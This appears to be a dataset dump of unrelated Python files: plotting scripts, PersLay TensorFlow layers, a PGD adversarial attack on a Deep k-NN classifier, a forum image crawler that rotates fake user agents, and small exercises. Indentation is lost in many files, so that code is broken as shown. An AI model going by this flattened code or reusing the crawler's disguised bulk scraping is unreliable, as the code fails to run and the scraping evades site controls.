ax = fig.add_subplot(111)
color_0 = '#A6A6A6'
color_1 = 'b'
# title = 'Pattern completion test pattern %d' % (pn)
# title = 'MT spikes'
title = '%s spikes ' % (cell_type.capitalize())
plot_raster(training_params, training_fn, ax, pn, title=title, color=color_0, alpha=0.9)
plot_raster(params, test_fn, ax, pn, title=title, color=color_1, alpha=1.)
# plot_sniff_input(params, ax)
output_fn = params['figure_folder'] + '/' + 'competion_raster_%s_%d.png' % (cell_type, pn)
        print('Saving figure to', output_fn)
pylab.savefig(output_fn, dpi=(300))
pylab.show()
|
nilq/baby-python
|
python
|
# %%
# ml + loss vs inner steps (Sigmoid best val)
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
from pathlib import Path
print('running')
save_plot = True
# save_plot = False
# - data for distance
inner_steps_for_dist = [1, 2, 4, 8, 16, 32]
meta_test_cca = [0.2801, 0.2866, 0.2850, 0.2848, 0.2826, 0.2914]
meta_test_cca_std = [0.0351, 0.0336, 0.0322, 0.0341, 0.0321, 0.0390]
# - data for meta-loss
inner_steps_for_loss = [0, 1, 2, 4, 8, 16, 32]
loss_maml0 = 43.43485323588053
meta_test_loss = [loss_maml0, 10.404328906536103, 4.988216777642568, 5.07447034517924, 5.449032692114512, 5.36303452650706, 4.339294484257698]
# - create plot
fig, axs = plt.subplots(2, 1, sharex=True, tight_layout=True)
axs[0].errorbar(inner_steps_for_dist, meta_test_cca, yerr=meta_test_cca_std, marker='x', label='dCCA')
# axs[0].errorbar(inner_steps_for_dist, meta_test_ned, yerr=meta_test_ned_std, marker='x', label='NED')
axs[0].axhline(y=0.12, color='r', linestyle='--', label='dCCA previous work [15]')
axs[0].legend()
axs[0].set_title('Representation difference vs adaptation\'s inner steps')
axs[0].set_ylabel('Representation change')
# axs[0].set_ylim([0, 1])
axs[1].plot(inner_steps_for_loss, meta_test_loss, marker='x', label='loss', color='g')
axs[1].set_title('Meta-Validation loss vs adaptation\'s inner steps')
axs[1].set_xlabel('adaptation\'s inner steps')
axs[1].set_ylabel('Loss')
# axs[1].axhline(y=loss_maml0, color='g', linestyle='--', label='not adapted')
axs[1].get_xaxis().set_major_locator(MaxNLocator(integer=True))
axs[1].legend()
plt.tight_layout()
if save_plot:
root = Path('~/Desktop').expanduser()
plt.savefig(root / 'ml_loss_vs_inner_steps_sigmoid_best.png')
plt.savefig(root / 'ml_loss_vs_inner_steps_sigmoid_best.svg')
plt.savefig(root / 'ml_loss_vs_inner_steps_sigmoid_best.pdf')
plt.show()
#%%
# ml + loss vs inner steps (ReLU best net)
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
from pathlib import Path
print('running')
save_plot = True
# save_plot = False
# - data for distance
inner_steps_for_dist = [1, 2, 4, 8, 16, 32]
meta_test_cca = [0.2876, 0.2962, 0.2897, 0.3086, 0.2951, 0.3024]
meta_test_cca_std = [0.0585, 0.0649, 0.0575, 0.0625, 0.0565, 0.0620]
# - data for meta-loss
inner_steps_for_loss = [0, 1, 2, 4, 8, 16, 32]
loss_maml0 = 19.27044554154078
# loss_maml0_std = 1.019144981585053
meta_test_loss = [loss_maml0,
5.545517734686533, 7.434794012705485, 6.754467636346817, 6.577781716982524, 3.731084116299947, 6.21407161851724]
# plt.title("Meta-test vs Depth of ResNet")
fig, axs = plt.subplots(2, 1, sharex=True, tight_layout=True)
axs[0].errorbar(inner_steps_for_dist, meta_test_cca, yerr=meta_test_cca_std, marker='x', label='dCCA')
axs[0].axhline(y=0.12, color='r', linestyle='--', label='dCCA previous work [15]')
axs[0].legend()
axs[0].set_title('Representation difference vs adaptation\'s inner steps')
axs[0].set_ylabel('Representation change')
# axs[0].set_ylim([0, 1])
axs[1].plot(inner_steps_for_loss, meta_test_loss, marker='x', label='loss', color='g')
axs[1].set_title('Meta-Validation loss vs adaptation\'s inner steps')
axs[1].set_xlabel('adaptation\'s inner steps')
axs[1].set_ylabel('Loss')
# axs[1].axhline(y=loss_maml0, color='g', linestyle='--', label='not adapted')
axs[1].get_xaxis().set_major_locator(MaxNLocator(integer=True))
axs[1].legend()
plt.tight_layout()
if save_plot:
root = Path('~/Desktop').expanduser()
plt.savefig(root / 'ml_loss_vs_inner_steps_relu_best.png')
plt.savefig(root / 'ml_loss_vs_inner_steps_relu_best.svg')
plt.savefig(root / 'ml_loss_vs_inner_steps_relu_best.pdf')
plt.show()
print('done')
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Password generator to generate a password based on the specified pattern.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2018 - 2019 by rgb-24bit.
:license: MIT, see LICENSE for more details.
"""
from .__version__ import __version__, __description__
from .__version__ import __author__, __author_email__
from .__version__ import __license__, __copyright__
from rgpg.core import cli
if __name__ == '__main__':
    cli()
|
nilq/baby-python
|
python
|
"""Module :mod:`perslay.archi` implement the persistence layer."""
# Authors: Mathieu Carriere <mathieu.carriere3@gmail.com>
# License: MIT
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
# Post-processing operation with combination of batch normalization, dropout and relu
def _post_processing(vector, pro, dropout_value=.9):
for c in pro:
if c == "b":
vector = tf.layers.batch_normalization(vector)
if c == "d":
vector = tf.nn.dropout(vector, dropout_value)
if c == "r":
vector = tf.nn.relu(vector)
return vector
# Vectorization implementing DeepSet architecture
def permutation_equivariant_layer(inp, dimension, perm_op, L_init, G_init, bias_init, L_const, G_const, bias_const, train_vect):
""" DeepSet PersLay """
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
lbda = tf.get_variable("L", shape=[dimension_before, dimension], initializer=L_init, trainable=train_vect) if not L_const else tf.get_variable("L", initializer=L_init)
b = tf.get_variable("b", shape=[1, 1, dimension], initializer=bias_init, trainable=train_vect) if not bias_const else tf.get_variable("b", initializer=bias_init)
A = tf.reshape(tf.einsum("ijk,kl->ijl", inp, lbda), [-1, num_pts, dimension])
if perm_op is not None:
if perm_op == "max":
beta = tf.tile(tf.expand_dims(tf.reduce_max(inp, axis=1), 1), [1, num_pts, 1])
elif perm_op == "min":
beta = tf.tile(tf.expand_dims(tf.reduce_min(inp, axis=1), 1), [1, num_pts, 1])
elif perm_op == "sum":
beta = tf.tile(tf.expand_dims(tf.reduce_sum(inp, axis=1), 1), [1, num_pts, 1])
else:
raise Exception("perm_op should be min, max or sum")
gamma = tf.get_variable("G", shape=[dimension_before, dimension], initializer=G_init, trainable=train_vect) if not G_const else tf.get_variable("G", initializer=G_init)
B = tf.reshape(tf.einsum("ijk,kl->ijl", beta, gamma), [-1, num_pts, dimension])
return A - B + b
else:
return A + b
# Vectorizations taken from "Learning Representations of Persistence Barcodes"
def rational_hat_layer(inp, num_elements, q, mean_init, r_init, mean_const, r_const, train_vect):
""" Rational Hat PersLay """
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
mu = tf.get_variable("m", shape=[1, 1, dimension_before, num_elements], initializer=mean_init, trainable=train_vect) if not mean_const else tf.get_variable("m", initializer=mean_init)
r = tf.get_variable("r", shape=[1, 1, 1], initializer=r_init, trainable=train_vect) if not r_const else tf.get_variable("r", initializer=r_init)
bc_inp = tf.expand_dims(inp, -1)
norms = tf.norm(bc_inp - mu, ord=q, axis=2)
return 1/(1 + norms) - 1/(1 + tf.abs(tf.abs(r)-norms))
def rational_layer(inp, num_elements, mean_init, variance_init, alpha_init, mean_const, variance_const, alpha_const, train_vect):
""" Rational PersLay """
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
mu = tf.get_variable("m", shape=[1, 1, dimension_before, num_elements], initializer=mean_init, trainable=train_vect) if not mean_const else tf.get_variable("m", initializer=mean_init)
sg = tf.get_variable("s", shape=[1, 1, dimension_before, num_elements], initializer=variance_init, trainable=train_vect) if not variance_const else tf.get_variable("s", initializer=variance_init)
al = tf.get_variable("a", shape=[1, 1, num_elements], initializer=alpha_init, trainable=train_vect) if not alpha_const else tf.get_variable("a", initializer=alpha_init)
bc_inp = tf.expand_dims(inp, -1)
return 1/tf.pow(1+tf.reduce_sum(tf.multiply(tf.abs(bc_inp - mu), tf.abs(sg)), axis=2), al)
def exponential_layer(inp, num_elements, mean_init, variance_init, mean_const, variance_const, train_vect):
""" Exponential PersLay """
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
mu = tf.get_variable("m", shape=[1, 1, dimension_before, num_elements], initializer=mean_init, trainable=train_vect) if not mean_const else tf.get_variable("m", initializer=mean_init)
sg = tf.get_variable("s", shape=[1, 1, dimension_before, num_elements], initializer=variance_init, trainable=train_vect) if not variance_const else tf.get_variable("s", initializer=variance_init)
bc_inp = tf.expand_dims(inp, -1)
return tf.exp(tf.reduce_sum(-tf.multiply(tf.square(bc_inp - mu), tf.square(sg)), axis=2))
# Vectorizations implementing persistence landscapes
def landscape_layer(inp, num_samples, sample_init, sample_const, train_vect):
""" Landscape PersLay """
sp = tf.get_variable("s", shape=[1, 1, num_samples], initializer=sample_init, trainable=train_vect) if not sample_const else tf.get_variable("s", initializer=sample_init)
return tf.maximum( .5 * (inp[:, :, 1:2] - inp[:, :, 0:1]) - tf.abs(sp - .5 * (inp[:, :, 1:2] + inp[:, :, 0:1])), np.array([0]))
# Vectorizations implementing Betti curves
def betti_layer(inp, theta, num_samples, sample_init, sample_const, train_vect):
""" Betti PersLay """
sp = tf.get_variable("s", shape=[1, 1, num_samples], initializer=sample_init, trainable=train_vect) if not sample_const else tf.get_variable("s", initializer=sample_init)
X, Y = inp[:, :, 0:1], inp[:, :, 1:2]
return 1. / ( 1. + tf.exp( -theta * (.5*(Y-X) - tf.abs(sp - .5*(Y+X))) ) )
# Vectorizations implementing persistence entropy
def entropy_layer(inp, theta, num_samples, sample_init, sample_const, train_vect):
""" Entropy PersLay
WARNING: this function assumes that padding values are zero
"""
bp_inp = tf.einsum("ijk,kl->ijl", inp, tf.constant(np.array([[1.,-1.],[0.,1.]], dtype=np.float32)))
sp = tf.get_variable("s", shape=[1, 1, num_samples], initializer=sample_init, trainable=train_vect) if not sample_const else tf.get_variable("s", initializer=sample_init)
L, X, Y = bp_inp[:, :, 1:2], bp_inp[:, :, 0:1], bp_inp[:, :, 0:1] + bp_inp[:, :, 1:2]
LN = tf.multiply(L, 1. / tf.expand_dims(tf.matmul(L[:,:,0], tf.ones([L.shape[1],1])), -1))
entropy_terms = tf.where(LN > 0., -tf.multiply(LN, tf.log(LN)), LN)
return tf.multiply(entropy_terms, 1. / ( 1. + tf.exp( -theta * (.5*(Y-X) - tf.abs(sp - .5*(Y+X))) ) ))
# Vectorizations implementing persistence images
def image_layer(inp, image_size, image_bnds, variance_init, variance_const, train_vect):
""" Persistence Image PersLay """
bp_inp = tf.einsum("ijk,kl->ijl", inp, tf.constant(np.array([[1.,-1.],[0.,1.]], dtype=np.float32)))
dimension_before, num_pts = inp.shape[2].value, inp.shape[1].value
coords = [tf.range(start=image_bnds[i][0], limit=image_bnds[i][1], delta=(image_bnds[i][1] - image_bnds[i][0]) / image_size[i]) for i in range(dimension_before)]
M = tf.meshgrid(*coords)
mu = tf.concat([tf.expand_dims(tens, 0) for tens in M], axis=0)
sg = tf.get_variable("s", shape=[1], initializer=variance_init, trainable=train_vect) if not variance_const else tf.get_variable("s", initializer=variance_init)
bc_inp = tf.reshape(bp_inp, [-1, num_pts, dimension_before] + [1 for _ in range(dimension_before)])
return tf.exp(tf.reduce_sum( -tf.square(bc_inp-mu) / (2*tf.square(sg[0])), axis=2)) / (2*np.pi*tf.square(sg[0]))
def perslay_channel(output, name, diag, **kwargs):
""" PersLay channel for persistence diagrams
    output : list to which the PersLay output will be appended
name : name of the operation for tensorflow
diag : big matrix of shape [N_diag, N_pts_per_diag, dimension_diag (coordinates of points) + 1 (mask--0 or 1)]
"""
try:
train_weight = kwargs["train_weight"]
except KeyError:
train_weight = True
try:
train_vect = kwargs["train_vect"]
except KeyError:
train_vect = True
N, dimension_diag = diag.get_shape()[1], diag.get_shape()[2]
tensor_mask = diag[:, :, dimension_diag - 1]
tensor_diag = diag[:, :, :dimension_diag - 1]
if kwargs["persistence_weight"] == "linear":
with tf.variable_scope(name + "-linear_pweight"):
C = tf.get_variable("C", shape=[1], initializer=kwargs["coeff_init"], trainable=train_weight) if not kwargs["coeff_const"] else tf.get_variable("C", initializer=kwargs["coeff_init"])
weight = C * tf.abs(tensor_diag[:, :, 1:2]-tensor_diag[:, :, 0:1])
if kwargs["persistence_weight"] == "power":
with tf.variable_scope(name + "-power_pweight"):
p = kwargs["power_p"]
C = tf.get_variable("C", shape=[1], initializer=kwargs["coeff_init"], trainable=train_weight) if not kwargs["coeff_const"] else tf.get_variable("C", initializer=kwargs["coeff_init"])
weight = C * tf.pow(tf.abs(tensor_diag[:, :, 1:2]-tensor_diag[:, :, 0:1]), p)
if kwargs["persistence_weight"] == "grid":
with tf.variable_scope(name + "-grid_pweight"):
W = tf.get_variable("W", shape=kwargs["grid_size"], initializer=kwargs["grid_init"], trainable=train_weight) if not kwargs["grid_const"] else tf.get_variable("W", initializer=kwargs["grid_init"])
indices = []
for dim in range(dimension_diag-1):
[m, M] = kwargs["grid_bnds"][dim]
coords = tf.slice(tensor_diag, [0, 0, dim], [-1, -1, 1])
ids = kwargs["grid_size"][dim] * (coords - m)/(M - m)
indices.append(tf.cast(ids, tf.int32))
weight = tf.expand_dims(tf.gather_nd(params=W, indices=tf.concat(indices, axis=2)), -1)
if kwargs["persistence_weight"] == "gmix":
with tf.variable_scope(name + "-gmix_pweight"):
M = tf.get_variable("M", shape=[1,1,2,kwargs["gmix_num"]], initializer=kwargs["gmix_m_init"], trainable=train_weight) if not kwargs["gmix_m_const"] else tf.get_variable("M", initializer=kwargs["gmix_m_init"])
V = tf.get_variable("V", shape=[1,1,2,kwargs["gmix_num"]], initializer=kwargs["gmix_v_init"], trainable=train_weight) if not kwargs["gmix_v_const"] else tf.get_variable("V", initializer=kwargs["gmix_v_init"])
bc_inp = tf.expand_dims(tensor_diag, -1)
weight = tf.expand_dims(tf.reduce_sum(tf.exp(tf.reduce_sum(-tf.multiply(tf.square(bc_inp - M), tf.square(V)), axis=2)), axis=2), -1)
# First layer of channel: processing of the persistence diagrams by vectorization of diagram points
if kwargs["layer"] == "pm": # Channel with permutation equivariant layers
for idx, (dim, pop) in enumerate(kwargs["peq"]):
with tf.variable_scope(name + "-perm_eq-" + str(idx)):
tensor_diag = permutation_equivariant_layer(tensor_diag, dim, pop, kwargs["weight_init"], kwargs["weight_init"], kwargs["bias_init"], kwargs["weight_const"], kwargs["weight_const"], kwargs["bias_const"], train_vect)
elif kwargs["layer"] == "ls": # Channel with landscape layer
with tf.variable_scope(name + "-samples"):
tensor_diag = landscape_layer(tensor_diag, kwargs["num_samples"], kwargs["sample_init"], kwargs["sample_const"], train_vect)
elif kwargs["layer"] == "bc": # Channel with Betti layer
with tf.variable_scope(name + "-samples"):
tensor_diag = betti_layer(tensor_diag, kwargs["theta"], kwargs["num_samples"], kwargs["sample_init"], kwargs["sample_const"], train_vect)
elif kwargs["layer"] == "en": # Channel with entropy layer
with tf.variable_scope(name + "-samples"):
tensor_diag = entropy_layer(tensor_diag, kwargs["theta"], kwargs["num_samples"], kwargs["sample_init"], kwargs["sample_const"], train_vect)
elif kwargs["layer"] == "im": # Channel with image layer
with tf.variable_scope(name + "-bandwidth"):
tensor_diag = image_layer(tensor_diag, kwargs["image_size"], kwargs["image_bnds"], kwargs["variance_init"], kwargs["variance_const"], train_vect)
elif kwargs["layer"] == "ex": # Channel with exponential layer
with tf.variable_scope(name + "-gaussians"):
tensor_diag = exponential_layer(tensor_diag, kwargs["num_elements"], kwargs["mean_init"], kwargs["variance_init"], kwargs["mean_const"], kwargs["variance_const"], train_vect)
elif kwargs["layer"] == "rt": # Channel with rational layer
with tf.variable_scope(name + "-bandwidth"):
tensor_diag = rational_layer(tensor_diag, kwargs["num_elements"], kwargs["mean_init"], kwargs["variance_init"], kwargs["alpha_init"], kwargs["mean_const"], kwargs["variance_const"], kwargs["alpha_const"], train_vect)
elif kwargs["layer"] == "rh": # Channel with rational hat layer
with tf.variable_scope(name + "-bandwidth"):
tensor_diag = rational_hat_layer(tensor_diag, kwargs["num_elements"], kwargs["q"], kwargs["mean_init"], kwargs["r_init"], kwargs["mean_const"], kwargs["r_const"], train_vect)
output_dim = len(tensor_diag.shape) - 2
vector = None # to avoid warning
if output_dim == 1:
# Apply weight and mask
if kwargs["persistence_weight"] is not None:
tiled_weight = tf.tile(weight, [1, 1, tensor_diag.shape[2].value])
tensor_diag = tf.multiply(tensor_diag, tiled_weight)
tiled_mask = tf.tile(tf.expand_dims(tensor_mask, -1), [1, 1, tensor_diag.shape[2].value])
masked_layer = tf.multiply(tensor_diag, tiled_mask)
# Permutation invariant operation
if kwargs["perm_op"] == "topk": # k first values
masked_layer_t = tf.transpose(masked_layer, perm=[0, 2, 1])
values, indices = tf.nn.top_k(masked_layer_t, k=kwargs["keep"])
vector = tf.reshape(values, [-1, kwargs["keep"] * tensor_diag.shape[2].value])
elif kwargs["perm_op"] == "sum": # sum
vector = tf.reduce_sum(masked_layer, axis=1)
elif kwargs["perm_op"] == "max": # maximum
vector = tf.reduce_max(masked_layer, axis=1)
elif kwargs["perm_op"] == "mean": # minimum
vector = tf.reduce_mean(masked_layer, axis=1)
# Second layer of channel: fully-connected (None if fc_layers is set to [], default value)
for idx, tup in enumerate(kwargs["fc_layers"]):
# tup is a tuple whose element are
# 1. dim of fully-connected,
# 2. string for processing,
# 3. (optional) dropout value
with tf.variable_scope(name + "-fc-" + str(idx)):
vector = tf.layers.dense(vector, tup[0])
with tf.variable_scope(name + "-bn-" + str(idx)):
if len(tup) == 2:
vector = _post_processing(vector, tup[1])
else:
vector = _post_processing(vector, tup[1], tup[2])
elif output_dim == 2:
# Apply weight and mask
if kwargs["persistence_weight"] is not None:
weight = tf.expand_dims(weight, -1)
tiled_weight = tf.tile(weight, [1, 1, tensor_diag.shape[2].value, tensor_diag.shape[3].value])
tensor_diag = tf.multiply(tensor_diag, tiled_weight)
tiled_mask = tf.tile(tf.reshape(tensor_mask, [-1, N, 1, 1]), [1, 1, tensor_diag.shape[2].value, tensor_diag.shape[3].value])
masked_layer = tf.multiply(tensor_diag, tiled_mask)
# Permutation invariant operation
if kwargs["perm_op"] == "sum": # sum
vector = tf.reduce_sum(masked_layer, axis=1)
elif kwargs["perm_op"] == "max": # maximum
vector = tf.reduce_max(masked_layer, axis=1)
elif kwargs["perm_op"] == "mean": # minimum
vector = tf.reduce_mean(masked_layer, axis=1)
# Second layer of channel: convolution
vector = tf.expand_dims(vector, -1)
for idx, tup in enumerate(kwargs["cv_layers"]):
# tup is a tuple whose element are
# 1. num of filters,
# 2. kernel size,
# 3. string for postprocessing,
# 4. (optional) dropout value
with tf.variable_scope(name + "-cv-" + str(idx)):
vector = tf.layers.conv2d(vector, filters=tup[0], kernel_size=tup[1])
with tf.variable_scope(name + "-bn-" + str(idx)):
if len(tup) == 3:
vector = _post_processing(vector, tup[2])
else:
vector = _post_processing(vector, tup[2], tup[3])
vector = tf.layers.flatten(vector)
output.append(vector)
return vector
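# Hedged usage sketch (assumptions: TensorFlow 1.x, diagrams padded to 50 points
# with a trailing 0/1 mask column; the option values are illustrative, not taken
# from the original experiments).
if __name__ == "__main__":
    diag = tf.placeholder(tf.float32, shape=[None, 50, 3])  # (birth, death, mask)
    outputs = []
    vector = perslay_channel(
        outputs, "channel1", diag,
        layer="ls",                                      # landscape vectorization
        num_samples=32,
        sample_init=tf.random_uniform_initializer(0., 1.),
        sample_const=False,
        persistence_weight=None,                         # skip the weighting step
        perm_op="sum",                                   # permutation-invariant aggregation
        fc_layers=[],                                    # no fully-connected post-processing
    )
    print(vector)  # Tensor of shape (?, 32)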
|
nilq/baby-python
|
python
|
from sqlalchemy.dialects.postgresql import UUID
from app.common.sqlalchemy_extensions import utcnow
from database import db
class BaseModel(db.Model):
__abstract__ = True
id = db.Column(
UUID,
primary_key=True,
server_default=db.func.uuid_generate_v4())
created = db.Column(db.DateTime, server_default=utcnow())
last_update = db.Column(
db.DateTime, server_default=utcnow(), onupdate=utcnow())
|
nilq/baby-python
|
python
|
"""
Edge Detection.
A high-pass filter sharpens an image. This program analyzes every
pixel in an image in relation to the neighboring pixels to sharpen
the image.
"""
kernel = [[-1, -1, -1],
[-1, 9, -1],
[-1, -1, -1]]
img = None
def setup():
    global img  # rebind the module-level img rather than creating a setup()-local
    size(640, 360)
    img = loadImage("moon.jpg")  # Load the original image
    noLoop()
def draw():
image(img, 0, 0) # Displays the image from point (0,0)
img.loadPixels()
# Create an opaque image of the same size as the original
edgeImg = createImage(img.width, img.height, RGB)
# Loop through every pixel in the image.
for y in range(1, img.height - 1): # Skip top and bottom edges
for x in range(1, img.width - 1): # Skip left and right edges
sum = 0 # Kernel sum for this pixel
for ky in range(-1, 2, 1):
for kx in range(-1, 2, 1):
# Calculate the adjacent pixel for this kernel point
pos = (y + ky) * img.width + (x + kx)
# Image is grayscale, red/green/blue are identical
val = red(img.pixels[pos])
# Multiply adjacent pixels based on the kernel values
sum += kernel[ky + 1][kx + 1] * val
# For this pixel in the image, set the gray value
# based on the sum from the kernel
edgeImg.pixels[y * img.width + x] = color(sum, sum, sum)
# State that there are changes to edgeImg.pixels
edgeImg.updatePixels()
image(edgeImg, width / 2, 0) # Draw the image
|
nilq/baby-python
|
python
|
"""
Explanation of DFS and BFS (in Chinese):
https://zhuanlan.zhihu.com/p/50187643
"""
class Solution:
def minDepth(self,root):
if not root:
return 0
l = self.minDepth(root.left)
r = self.minDepth(root.right)
        # If one subtree is empty, the shallowest leaf lies in the other subtree.
        return l + r + 1 if l == 0 or r == 0 else min(l, r) + 1
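# Hedged usage sketch (assumption: a minimal TreeNode class, since the original
# snippet does not define the node type it traverses).
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right
if __name__ == '__main__':
    # Tree:  1        The shortest root-to-leaf path is 1 -> 3.
    #       / \
    #      2   3
    #     /
    #    4
    root = TreeNode(1, TreeNode(2, TreeNode(4)), TreeNode(3))
    print(Solution().minDepth(root))  # 2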
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Crawl images from posts on the 春暖花开 forum
import os
import fake_useragent
import re
import requests
import time
from bs4 import BeautifulSoup
class Picture:
def all_url(self, url):
"""一个页面有许多图集,而这样的页面有很多,该方法是根据传入的根url,获取所有的页面url"""
list_str = url.split('-')
html = self.request(url)
last = BeautifulSoup(html.text, 'lxml').find('span', id='fd_page_bottom').find('a', class_='last')['href']
max_page = str(last).split('-')[-1].split('.')[0]
for index in range(1, int(max_page) + 1):
new_url = '%s-%s-%d.html' % (list_str[0], list_str[1], index)
            print('Processing page: %s' % new_url)
self.one_page(new_url)
def one_page(self, url):
"""处理一个页面中的所有图集"""
html = self.request(url)
all_tbody = BeautifulSoup(html.text, 'lxml').find_all('tbody', id=re.compile('(normalthread_)[0-9]+'))
for tbody in all_tbody:
href = tbody.find('td', class_='icn').find('a')['href']
img_url = 'http://%s/%s' % (url.split('/')[2], str(href))
            print('Processing gallery: %s' % img_url)
path = str(href).split('-')[1]
self.save_img(img_url, path)
            print('Finished processing this gallery')
def save_img(self, url, path):
if self.makedir(path):
html = self.request(url)
all_img = BeautifulSoup(html.text, 'lxml').find_all('img', class_='zoom')
for img in all_img:
try:
img_url = img['file']
except KeyError:
continue
img = self.request(img_url)
if img.status_code != 200:
                    print('Request failed: %d' % img.status_code)
continue
file_name = str(img_url).split('/')[-1]
with open(file_name, 'ab') as f:
f.write(img.content)
time.sleep(3)
@staticmethod
def makedir(path):
"""创建图集文件夹"""
path = path.strip()
full_path = os.path.join("E:\Image\sex", path)
if not os.path.exists(full_path):
print('建了一个名字叫做', path, '的文件夹!')
os.makedirs(full_path)
# 切换到新建的目录
os.chdir(full_path)
return True
else:
print(path, '文件夹已经存在了!')
return False
@staticmethod
def request(url):
"""请求url并返回响应结果"""
fa = fake_useragent.UserAgent()
headers = {
'User-Agent': fa.random,
}
content = requests.get(url, headers=headers)
return content
if __name__ == '__main__':
p = Picture()
p.all_url('http://qqlive8.space/forum-158-1.html')
|
nilq/baby-python
|
python
|
import logging
import numpy as np
import torch
import torch.optim as optim
INFTY = 1e20
class DKNN_PGD(object):
"""
Implement gradient-based attack on DkNN with L-inf norm constraint.
The loss function is the same as the L-2 attack, but it uses PGD as an
optimizer.
"""
def __init__(self, dknn):
self.dknn = dknn
self.device = dknn.device
self.layers = dknn.layers
self.guide_reps = {}
self.thres = None
self.coeff = None
def __call__(self, x_orig, label, guide_layer, m, epsilon=0.1,
max_epsilon=0.3, max_iterations=1000, num_restart=1,
rand_start=True, thres_steps=100, check_adv_steps=100,
verbose=True):
# make sure we run at least once
if num_restart < 1:
num_restart = 1
# if not using randomized start, no point in doing more than one start
if not rand_start:
num_restart = 1
label = label.cpu().numpy()
batch_size = x_orig.size(0)
min_, max_ = x_orig.min(), x_orig.max()
# initialize adv to the original
x_adv = x_orig.detach()
best_num_nn = np.zeros((batch_size, ))
# set coefficient of guide samples
self.coeff = torch.zeros((x_orig.size(0), m))
self.coeff[:, :m // 2] += 1
self.coeff[:, m // 2:] -= 1
for i in range(num_restart):
# initialize perturbation
delta = torch.zeros_like(x_adv)
if rand_start:
delta.uniform_(- max_epsilon, max_epsilon)
delta.requires_grad_()
for iteration in range(max_iterations):
x = torch.clamp(x_orig + delta, min_, max_)
# adaptively choose threshold and guide samples every
# <thres_steps> iterations
with torch.no_grad():
if iteration % thres_steps == 0:
thres = self.dknn.get_neighbors(x)[0][0][:, -1]
self.thres = torch.tensor(thres).to(self.device).view(
batch_size, 1)
self.find_guide_samples(
x, label, m=m, layer=guide_layer)
reps = self.dknn.get_activations(x, requires_grad=True)
loss = self.loss_function(reps)
loss.backward()
# perform update on delta
with torch.no_grad():
                    delta -= epsilon * delta.grad.detach().sign()
                    delta.clamp_(- max_epsilon, max_epsilon)
                    delta.grad.zero_()  # clear the accumulated gradient before the next step
if (verbose and iteration % (np.ceil(max_iterations / 10)) == 0):
print(' step: %d; loss: %.3f' %
(iteration, loss.cpu().detach().numpy()))
                if ((iteration + 1) % check_adv_steps == 0 or
                        iteration == max_iterations - 1):
with torch.no_grad():
# check if x are adversarial. Only store adversarial
# examples if they have a larger number of wrong
                    # neighbors than previous
is_adv, num_nn = self.check_adv(x, label)
for j in range(batch_size):
if is_adv[j] and num_nn[j] > best_num_nn[j]:
x_adv[j] = x[j]
best_num_nn[j] = num_nn[j]
with torch.no_grad():
is_adv, _ = self.check_adv(x_adv, label)
if verbose:
print('number of successful adv: %d/%d' %
(is_adv.sum(), batch_size))
return x_adv
def check_adv(self, x, label):
"""Check if label of <x> predicted by <dknn> matches with <label>"""
output = self.dknn.classify(x)
num_nn = output.max(1)
y_pred = output.argmax(1)
is_adv = (y_pred != label).astype(np.float32)
return is_adv, num_nn
def loss_function(self, reps):
"""Returns the loss averaged over the batch (first dimension of x) and
L-2 norm squared of the perturbation
"""
batch_size = reps[self.layers[0]].size(0)
adv_loss = torch.zeros(
(batch_size, len(self.layers)), device=self.device)
# find squared L-2 distance between original samples and their
# adversarial examples at each layer
for l, layer in enumerate(self.layers):
rep = reps[layer].view(batch_size, 1, -1)
dist = ((rep - self.guide_reps[layer])**2).sum(2)
fx = self.thres - dist
Fx = torch.max(torch.tensor(0., device=self.device),
self.coeff.to(self.device) * fx).sum(1)
adv_loss[:, l] = Fx
return adv_loss.mean()
def find_guide_samples(self, x, label, m=100, layer='relu1'):
"""Find k nearest neighbors to <x> that all have the same class but not
equal to <label>
"""
num_classes = self.dknn.num_classes
x_train = self.dknn.x_train
y_train = self.dknn.y_train
batch_size = x.size(0)
nn = torch.zeros((m, ) + x.size()).transpose(0, 1)
D, I = self.dknn.get_neighbors(
x, k=x_train.size(0), layers=[layer])[0]
for i, (d, ind) in enumerate(zip(D, I)):
mean_dist = np.zeros((num_classes, ))
for j in range(num_classes):
mean_dist[j] = np.mean(
d[np.where(y_train[ind] == j)[0]][:m // 2])
mean_dist[label[i]] += INFTY
nearest_label = mean_dist.argmin()
nn_ind = np.where(y_train[ind] == nearest_label)[0][:m // 2]
nn[i, m // 2:] = x_train[ind[nn_ind]]
nn_ind = np.where(y_train[ind] == label[i])[0][:m // 2]
nn[i, :m // 2] = x_train[ind[nn_ind]]
# initialize self.guide_reps if empty
if not self.guide_reps:
guide_rep = self.dknn.get_activations(
nn[0], requires_grad=False)
for l in self.layers:
# set a zero tensor before filling it
size = (batch_size, ) + guide_rep[l].view(m, -1).size()
self.guide_reps[l] = torch.zeros(size, device=self.device)
# fill self.guide_reps
for i in range(batch_size):
guide_rep = self.dknn.get_activations(
nn[i], requires_grad=False)
self.guide_reps[layer][i] = guide_rep[layer].view(
m, -1).detach()
|
nilq/baby-python
|
python
|
from projecteuler import util
from functools import reduce
from operator import mul
def solution():
"""
The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product.
What is the value of this product?
"""
ans = 0
with open('../data/problem_008_data.txt') as f:
n = [int(x) for x in f.read().replace('\n', '')]
    for i in range(len(n) - 12):  # only windows with a full 13 digits
tmp = reduce(mul, n[i:i + 13])
if tmp > ans:
ans = tmp
return ans
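# Equivalent sliding-window helper (illustrative sketch, not used by the
# assertion below; `digits` is any sequence of single digits):
def greatest_product(digits, k=13):
    return max(reduce(mul, digits[i:i + k]) for i in range(len(digits) - k + 1))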
if __name__ == '__main__':
assert str(solution()) == util.get_answer(8)
|
nilq/baby-python
|
python
